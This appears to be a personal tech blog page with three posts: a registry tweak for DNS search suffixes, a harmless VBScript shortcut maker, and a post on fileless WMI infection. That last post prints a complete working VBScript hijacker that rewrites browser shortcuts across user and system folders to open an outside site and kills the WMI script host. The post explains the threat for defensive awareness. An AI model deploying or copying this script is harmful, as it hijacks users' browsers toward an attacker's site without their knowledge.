Adding Search Suffix via Registry

How many times have you attempted to search across multiple domains and cannot find them. Well here is the easy way to set them.

Your welcome

 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
“SearchList”=”mikedopp.com,JoeLevi.com,google.com”

 
Posted in Interesting, Microsoft, Windows | Leave a comment

Write a complicated VBscript to create a link

First you have to create a small text file by the name mkshortcut.vbs. Use your favorite text editor to edit the file, even notepad will do. Then copy the following text and paste it into the file:

set WshShell = WScript.CreateObject(“WScript.Shell” )
set oShellLink = WshShell.CreateShortcut(Wscript.Arguments.Named(“shortcut”) & “.lnk”)
oShellLink.TargetPath = Wscript.Arguments.Named(“target”)
oShellLink.WindowStyle = 1
oShellLink.Save

Then save the file and exit the editor. Make sure that you move the file in a directory in your PATH (usually C:WINDOWS\System32 is fine). Now, from the command line you can create shortcuts this way:

mkshortcut /target:TargetName /shortcut:c:\users\<you>\desktop\ShortcutName

You will have to replace TargetName with the name of the target file and ShortcutName with the name of the shortcut to be created (do not include a .lnk extension!). For example:

C:>mkshortcut /target:”c:/documents and settings/<you>/desktop” /shortcut:”My Desktop”

 
Posted in Uncategorized | Leave a comment

Fileless infection using wmi

Ok that sounds all sorts of wrong or confusing.

“Windows Management Instrumentation (WMI) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is an industry initiative to develop a standard technology for accessing management information in an enterprise environment.” Credit

Still sounds a little like WTFunction?

Well think of WMI as a database for objects within windows.

Ok now we are done with that.

CODE in a VB script for infection (run in browser)

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
	BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\User\Desktop"
FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming"
FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
	For Each file In fso.GetFolder(FoldersDic(i)).Files
		If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
			set oShellLink = WshShell.CreateShortcut(file.Path)
			path = oShellLink.TargetPath
			name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
			If BrowserDic.Exists(LCase(name)) Then
				oShellLink.Arguments = link
				If file.Attributes And 1 Then
					file.Attributes = file.Attributes - 1
				End If
				oShellLink.Save
			End If
		End If
	Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

So what the heck? that is great code but how does this work or why?

Go to a website that has been compromised. Has a tiny little jscript or vbscript that runs in your browser.

In the code lifted from the source article shows the shortcut target adding an extra web site at the end thus making you go to a certain site because the shortcut is being told to.

starting WBEMTest we need to run it with administrator privileges. To do this, right click on the C:\Windows\System32\wbemtest.exe executable and then select Run as Administrator.  WBEMTest will now start.

This will help you to evaluate WMI infection that is spreading to your shortcuts.

This is nothing new but looks like its the next wave of spyware/hijackers to be concerned with.

 
Posted in Interesting, Microsoft, Security | Leave a comment